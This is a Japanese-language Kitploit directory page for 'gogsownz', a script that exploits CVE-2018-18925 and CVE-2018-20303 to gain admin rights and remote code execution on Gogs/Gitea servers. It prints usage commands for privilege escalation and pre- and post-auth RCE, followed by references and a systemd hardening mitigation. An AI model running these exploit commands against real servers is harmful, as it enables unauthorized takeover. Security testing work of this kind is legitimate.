Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
gogsownz — Gogs CVEs | Kitploit
ツール/GitHubGitHub/thez3ro/gogsownz
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用リモートアクセスツール
GitHubthez3ro/gogsownz

gogsownz

Gogs CVEs

リポジトリを見る
791586年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

GogsOwnz

GogsOwnzは、Gogs/Giteaサーバーで管理者権限とRCEを取得するためのシンプルなスクリプトです。 Gogs/Giteaの脆弱性(CVE-2018-18925、CVE-2018-20303を含む)を悪用します。

法的免責事項 このスクリプトは現状のまま提供されます。保証はありません。自己責任で使用し、法律を遵守してください。

典型的な使用方法 - [完全な使用方法をお読みください]

実行中のGogs/Giteaに関する情報を取得

python3 gogsownz.py https://127.0.0.1:3000/ -v --info

認証前の権限昇格を悪用

python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth

権限昇格を悪用

python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --cleanup

または、別の方法として

python3 gogsownz.py https://127.0.0.1:3000/ -v -c '<i_like_gogs_cookie>' --cleanup

認証前のRCEを悪用

python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth --rce 'sleep 10' --cleanup

認証後のRCEを悪用

python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --rce 'sleep 10' --cleanup

完全な使用方法

usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]
                url

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the from
                        "username:password"
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the
                        i_like_gogits Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v

謝辞

感謝:

  • Tencent Security (@md5_salt, @ma7h1as and @chromium1337)
  • PentesterLab (@snyff)
  • LuckyC4t
  • gogsセキュリティコミュニティ :D

参考文献

https://github.com/gogs/gogs/issues/5469
https://github.com/gogs/gogs/issues/5558
https://github.com/gogs/gogs/commit/8c8c37a66b4cef6fc8a995ab1b4fd6e530c49c51
https://github.com/gogs/gogs/issues/5599
https://2018.zeronights.ru/wp-content/uploads/materials/17-Who-owned-your-code.pdf

緩和策

systemdユニットファイルを適切に設定すれば、悪用がある程度抑制されていることに驚くでしょう。

[Unit]
Description=Gogs
After=syslog.target
After=network.target

[Service]
Type=simple
User=gogs
Group=gogs
WorkingDirectory=/home/gogs/installations/gogs/
ExecStart=/home/gogs/installations/gogs/gogs web
Restart=always
Environment=USER=gogs HOME=/home/gogs

# Some distributions may not support these hardening directives. If you cannot start the service due
# to an unknown option, comment out the ones not supported by your version of systemd.
ProtectSystem=full
PrivateDevices=yes
PrivateTmp=yes
NoNewPrivileges=true

[Install]
WantedBy=multi-user.target

これにより、少なくともファイルシステムへのアクセスはsystemdが作成する一時的なファイルシステムに制限されます。役立ちますが、権限昇格をパッチして管理者権限を与えないようにすべきでしょう...もちろん。

ツールをダウンロード